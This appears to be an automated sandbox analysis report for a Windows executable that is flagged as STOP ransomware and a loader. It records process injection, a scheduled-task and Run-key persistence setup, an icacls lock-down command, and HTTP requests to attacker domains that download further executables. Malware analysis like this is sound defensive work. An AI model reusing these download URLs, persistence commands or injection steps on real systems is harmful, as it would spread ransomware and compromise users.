Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 2, 2024, 7:42 a.m.	July 2, 2024, 7:53 a.m.

Size	806.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`88932ab33c38072946abc06b426d33b8`
SHA256	`d47e05b0ad27c651fb9cf73444e1f6a26514acb16998e92fca8be115ae6a2dee`
CRC32	`116D0935`
ssdeep	`12288:qIowhzaoWcGawk7yVe+H1JU7VuzpzS3oxAiXZcmQGLu5t15KBM0JiY3u3SZtr9XW:vhzL5MkmQ+H/2KFXVotzeM03aSpyr`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description)

buildcr.exe "C:\Users\test22\AppData\Local\Temp\buildcr.exe"
2520
- icacls.exe icacls "C:\Users\test22\AppData\Local\303d05f2-58c9-4b75-93b0-2e04fa9cb93f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  2616
buildcr.exe "C:\Users\test22\AppData\Local\Temp\buildcr.exe" --Admin IsNotAutoStart IsNotTask
2876
- build3.exe "C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe"
  2992
  - build3.exe "C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe"
    3040
    - schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"
      2180

Name	Response	Post-Analysis Lookup
defgyma.com	A 190.13.174.94 A 175.119.10.231 A 178.134.214.182 A 213.172.74.157 A 190.220.21.28 A 109.175.29.39 A 154.144.253.197 A 186.137.126.27 A 189.61.54.32 A 189.163.62.83	181.204.98.226
cajgtus.com	A 186.233.231.45 A 200.63.106.141 A 189.195.132.134 A 187.211.19.25 A 190.159.30.35 A 190.220.21.28 A 200.46.133.134 A 181.204.98.226 A 190.98.23.157 A 190.224.203.37	178.134.214.182
api.2ip.ua	A 104.21.65.24 A 172.67.139.220	104.21.65.24

IP Address	Status	Action
104.21.65.24	Active	Moloch
164.124.101.2	Active	Moloch
186.233.231.45	Active	Moloch
190.13.174.94	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2027026	ET POLICY External IP Address Lookup DNS Query (2ip .ua)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49171 -> 104.21.65.24:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 104.21.65.24:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49165 -> 104.21.65.24:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 104.21.65.24:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49174 -> 186.233.231.45:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.103:49174 -> 186.233.231.45:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.103:49174 -> 186.233.231.45:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 186.233.231.45:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.103:49172 -> 186.233.231.45:80	2036334	ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key	A Network Trojan was detected
TCP 186.233.231.45:80 -> 192.168.56.103:49172	2036335	ET MALWARE Win32/Filecoder.STOP Variant Public Key Download	A Network Trojan was detected
TCP 192.168.56.103:49173 -> 190.13.174.94:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.103:49173 -> 190.13.174.94:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 186.233.231.45:80 -> 192.168.56.103:49174	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 190.13.174.94:80 -> 192.168.56.103:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49171 104.21.65.24:443	C=US, O=Google Trust Services, CN=WE1	CN=2ip.ua	ff:79:da:c4:72:a8:32:8f:28:1d:c9:7f:3a:b0:c3:0e:3f:7e:7e:a1
TLSv1 192.168.56.103:49165 104.21.65.24:443	C=US, O=Google Trust Services, CN=WE1	CN=2ip.ua	ff:79:da:c4:72:a8:32:8f:28:1d:c9:7f:3a:b0:c3:0e:3f:7e:7e:a1

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 2, 2024, 7:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 2, 2024, 7:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 2, 2024, 7:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 2, 2024, 7:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 2, 2024, 7:44 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 2, 2024, 7:44 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW July 2, 2024, 7:44 a.m.	buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created. console_handle: 0x00000007	1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (4 events)

request	GET http://cajgtus.com/test2/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true
request	GET http://defgyma.com/dl/build2.exe
request	GET http://cajgtus.com/files/1/build3.exe
request	GET https://api.2ip.ua/geo.json

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 2, 2024, 7:44 a.m.	process_identifier: 2992 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c6c000 process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory July 2, 2024, 7:44 a.m.	process_identifier: 2992 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0	0

Foreign language identified in PE resource (34 events)

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_ICON

language

LANG_TURKISH

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x01fde090

size

0x00000468

name

RT_GROUP_ICON

language

LANG_TURKISH

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x01fde4f8

size

0x00000068

name

RT_GROUP_ICON

language

LANG_TURKISH

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x01fde4f8

size

0x00000068

name

RT_GROUP_ICON

language

LANG_TURKISH

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x01fde4f8

size

0x00000068

name

RT_GROUP_ICON

language

LANG_TURKISH

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x01fde4f8

size

0x00000068

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build2.exe
file	C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build2.exe
file	C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW July 2, 2024, 7:44 a.m.	thread_identifier: 412 thread_handle: 0x000000ac process_identifier: 2180 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1	0

An executable file was downloaded by the process buildcr.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile July 2, 2024, 7:43 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $_á3e`e`e`7` e`7`e`7`0e`<£ô`e`e`re`7`e`7`e`7`e`Riche`PELÈò¶cà ´Z¹ª#Ð@À¹Ñì#(¸¥H@Ðp.textW³´ `.rdataL\Ð^¸@@.dataÈÒ´0D@À.rsrc¥¸¦Z@@UìVEPñè;Ç¼Ñ@Æ^]ÂÇ¼Ñ@éðUìVñÇ¼Ñ@èßöEtVèYÆ^]ÂUì}t(~r"FW8ÛvQWjPèùÄWèåY_ËÆÇFè]ÂUìVSW^úrëË¸4C;Èw3úrëË~y;ÈvúrëËÿuØ+ÙÑûVÆèTë4}ÆèÎÀt$Førh4CPSÇèÄÏÆèÆ_[]ÂxHr@ëÀ3ÒfHÃUìVðW9^sè~+û9}s}E;ÆujÿûðèS3ÿèëCèGÀt:~rFëFuVúrNëNXPRQÇèðÄÏÆèkÿÿÿE_^]ÂVðÿþÿÿvè¿F;ÇsÿvWVè ëÿu!~ørvëÆ3Àf3À;ÇÀ÷Ø^ÃUìQQ9~sèÆF+Ç;EsE}vSNSVùr]üëUüùr]+ÃÀPUøUüBPEø+ÏÉQxPè^NÄ+ËÆè¨þÿÿ[ÆÉÂj¸(Ã@è6u}Ïÿþÿÿv}ë'3ÒjÇ[÷óNMìÑmìUì;Âs¸þÿÿ+Â;Èw< eüOèEë$EHeðEìÆEüènE¸ô@Ãu}ì}v!~rFëFPGPÿuEèxÄj3Ûè"ýÿÿEMFÆ~èàýÿÿè²Âuj3ÛèûüÿÿSSèóÌUììÉw3É Pè0YÉÃÈÿ3Ò÷ñøsèjMôèyüÿÿhP#CEôPè¶ÌUìÀPÿuEÀPÿuè¾EÄ]ÃUìVÿuñè÷ Ç¼Ñ@Æ^]ÂÿUìÿuÿuÿuÿuèEÄ]ÃÿUìÿuÿuÿuÿuèÀEÄ]ÃÿUì}Vt+qAþrëÐ9UrþrIÈ;Mv°ë2À^]ÂÿUìMìÉw3ÉQè= YÉÃÈÿ3Ò÷ñøsëjMôèûÿÿhP#CEôPèÃÌÿUìÿuÿuÿuÿuè1ÿÿÿÄ]ÃÿUìÿuÿuÿuÿuè4ÿÿÿÄ]ÃÿUìyEArIëÁÆ]ÂÿUìjÿuè[ÿÿÿYY]ÂÿUìQÿuüÿuÿuÿuÿuèzÿÿÿÄÉÃÿUìQÿuüÿuÿuÿuÿuèvÿÿÿÄÉÃÿUì}Vñt)~r#}FW8vÿuWjPèÿÿÿÄWèø Y_ÿuÎÇFèDÿÿÿ^]Âj¸fÂ@è2ù}èuÎþþvuë%3ÒjÆ[÷óOMìÑmìUì;ÂsjþX+Â;Èw4 eüFPÏèÿÿÿØë)EMèE@eðPÆEüèðþÿÿEì¸ù@Ã}èu]ì}vrGëGÿuPFPSèÑþÿÿÄjjÏèÿÿÿÿuÏ_wè}þÿÿèÂMè3öVjèÜþÿÿVVèí ÌjjèËþÿÿÃj¸Â@èñuðèºÿueüNÇÈÑ@èÆèYÂy$rAÃAÃÿVñjjNÇÈÑ@èpþÿÿÎ^éLÿUìVñèÔÿÿÿöEtVè\| YÆ^]ÂÿUìVÿuñèmÿÿÿÇÔÑ@Æ^]ÂÇÔÑ@éÿÿÿÿUìVñÇÔÑ@èÿÿÿöEtVè- YÆ^]ÂÿUìVÿuñèÿÿÿÇàÑ@Æ^]ÂÇàÑ@éIÿÿÿÿUìVñÇàÑ@è6ÿÿÿöEtVèÞYÆ^]ÂjD¸¬Â@èõhèÑ@MØèeüEØPM°è9ÿÿÿh¸CE°PèÌÿUìVuþþvèµÿÿÿ9qsÿqVèýÿÿë(}tþsA;ðsÆPjè2ýÿÿë öuVè²üÿÿ3À;ÆÀ÷Ø^]ÂÿUìVW}WñèàûÿÿÀt~rFëFÿu+øWVÎè2ë:jÿuÎèhÿÿÿÀt(NùrFëFÿuWQPè\|üÿÿÄÿuÎè9üÿÿÆ_^]ÂÿUìVÿuñè"YPÿuÎèpÿÿÿ^]ÂÿUìVñjÇFèúûÿÿÿuÎè¿ÿÿÿÆ^]ÂjD¸ÏÂ@è©høÑ@MØèÀÿÿÿeüEØPM°è<þÿÿh<CE°Pè>ÌÿUìUVñN;Êsè±ÿÿÿ+Ê;MsM}vBFSW~ørëßør?+MÚ]QS+ÂPúWè°ûÿÿF+EÄPÎèJûÿÿ_[Æ^]ÂÿUìS]VW}Gñ;Ãsè<ÿÿÿ+ÃEE;EsE;÷uEjÿÃPèSÿÿÿSjÎèIÿÿÿëFjÿuèñýÿÿÀt8rëÇNùrFëFÿuûWQPèõúÿÿÄÿuÎè²úÿÿ_Æ^[]ÂÿUìVñjÇFèúÿÿjÿjÿuÎèDÿÿÿÆ^]Âj¸òÂ@è>ñuð}Wè_eüÇWNÇÈÑ@è¥ÿÿÿÆè\|ÂÿUìVÿuñè¶ÿÿÿÇÔÑ@Æ^]ÂÿUìVÿuñèÿÿÿÇàÑ@Æ^]Â; 0CuóÃéDÿUìEVW3ÿ;ÇtG9}uè6j^0WWWWWè¿ÄÆë)9}tà9Esèj"Yñë×PÿuÿuèøÄ3À_^]ÃÿUìEVñÆFÀucèó FHlHhN; 8Ct 47CHpuèF;86CtF 47CHpuèFFö@puHpÆFë @FÆ^]ÂÿUìì3ÉWø;ñt3Àf;Ùy9Mp8hÿuMðè?ÿÿÿEðxu.ötf¶fEÀtÇ request_handle: 0x00cc000c	1	1	0
InternetReadFile July 2, 2024, 7:44 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $6økrh8rh8rh8ÏÖþ8sh8lËý8nh8lËë8üh8U_8{h8ri8Éh8lËì82h8lËü8sh8lËù8sh8Richrh8PELÒ¹aà j; @À>°¿lhd>/0¸@¸.textrhj `.data¨ÿ:n@À.kic>\|@À.rsrc/>0~@@¶sssökl"l.lHlZlplll¬lÀlÐlìlþlm m4mBm^mtmm m°mÊmÜmömnn&n@n\nlnnn n¬n¼nÔnænönoo,o@oTo`opoooêkÂoØoêopp.p:pHpVpnppp¦p´pÎpÜpüpq,q@qPqbq~qq¨q¶qÎqÜqêq r"r2r>rPrbrxrrªr¾rÚrärss s4sLsÒk¦k´k¦okÜsäsüst&t:tNtjttt²t¾tÊtÜtìtüt uu$u:uDuRubunuuuªu¸uÊuÜuöuvv6vLvfv~vv®vÈvÖvävðvww&w2w>wNwXwdwpwwªwÀwÐwæwöwxxx<xHxVxdxnsp:C AÀA`A4B`TB@ÞA@;B@Cp ATcX¸¬bad allocationlubimipemoxiluyexuwilusimazovahoyipixefuliguhifedejowibifunepageyuveciwicabutecohopecadedohomosiseroxagogukisegopezehuyorosecexeyunolezamugocimidezoyobugalodolobuvelelezocokakufofafacajoxecesuvusunixanofuloxucepofalimetominibidoluzogudawulapabevotuwSolofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaMawoyujewoyosigubufozo wami xuxolesenawemo dohamefejexeyukuore lacohocojalikukkurikolisidudiguyikawu danijekernel32.dllì¸@§»@Ðç@ITERATOR LIST CORRUPTED!C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\xutility"out of range"("_Myptr + _Off <= ((_Myvec )(this->_Getmycont()))->_Mylast && _Myptr + _Off >= ((_Myvec )(this->_Getmycont()))->_Myfirst", 0)"invalid argument"std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator +=("this->_Has_container()", 0)C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vectorstd::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::alloca request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0009fa00', u'virtual_address': u'0x0000b000', u'entropy': 7.7287513496061795, u'name': u'.rdata', u'virtual_size': u'0x0009f866'}

entropy

7.72875134961

description

A section with a high entropy has been found

entropy

0.793167701863

description

Overall entropy of this PE file is high

Potentially malicious URLs were found in the process memory dump (1 event)

url	http://www.openssl.org/support/faq.html

Yara rule detected in process memory (50 events)

description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications use DNS	rule	Network_DNS
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications use DNS	rule	Network_DNS
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	task schedule	rule	schtasks_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	[m] Generic Malware	rule	Generic_Malware_Zero_m

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 2, 2024, 7:44 a.m.	process_identifier: 3040 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper

reg_value

"C:\Users\test22\AppData\Local\303d05f2-58c9-4b75-93b0-2e04fa9cb93f\buildcr.exe" --AutoStart

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 2, 2024, 7:44 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3040 process_handle: 0x00000080	1	1	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2992 called NtSetContextThread to modify thread in remote process 3040
NtSetContextThread July 2, 2024, 7:44 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4201210 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 3040	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2520 resumed a thread in remote process 2684
Process injection	Process 2992 resumed a thread in remote process 3040
NtResumeThread July 2, 2024, 7:43 a.m.	thread_handle: 0x000002bc suspend_count: 1 process_identifier: 2684	1	0	0
NtResumeThread July 2, 2024, 7:44 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 3040	1	0	0

Uses suspicious command line tools or Windows utilities (1 event)

cmdline

icacls "C:\Users\test22\AppData\Local\303d05f2-58c9-4b75-93b0-2e04fa9cb93f" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Executed a process and injected code into it, probably while unpacking (12 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 2, 2024, 7:43 a.m.	thread_identifier: 2620 thread_handle: 0x0000030c process_identifier: 2616 current_directory: filepath: track: 1 command_line: icacls "C:\Users\test22\AppData\Local\303d05f2-58c9-4b75-93b0-2e04fa9cb93f" /deny *S-1-1-0:(OI)(CI)(DE,DC) filepath_r: stack_pivoted: 0 creation_flags: 72 (DETACHED_PROCESS\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000004f4	1	1
CreateProcessInternalW July 2, 2024, 7:43 a.m.	thread_identifier: 2688 thread_handle: 0x000002bc process_identifier: 2684 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\buildcr.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\buildcr.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\buildcr.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c4	1	1
NtResumeThread July 2, 2024, 7:43 a.m.	thread_handle: 0x000002bc suspend_count: 1 process_identifier: 2684	1	0
CreateProcessInternalW July 2, 2024, 7:44 a.m.	thread_identifier: 2996 thread_handle: 0x000002c0 process_identifier: 2992 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe" filepath_r: C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b8	1	1
CreateProcessInternalW July 2, 2024, 7:44 a.m.	thread_identifier: 3044 thread_handle: 0x0000007c process_identifier: 3040 current_directory: filepath: C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe" filepath_r: C:\Users\test22\AppData\Local\4798d325-d608-4ca6-9e7c-904ba0655e61\build3.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread July 2, 2024, 7:44 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection July 2, 2024, 7:44 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 3040 process_handle: 0x00000080	1	0
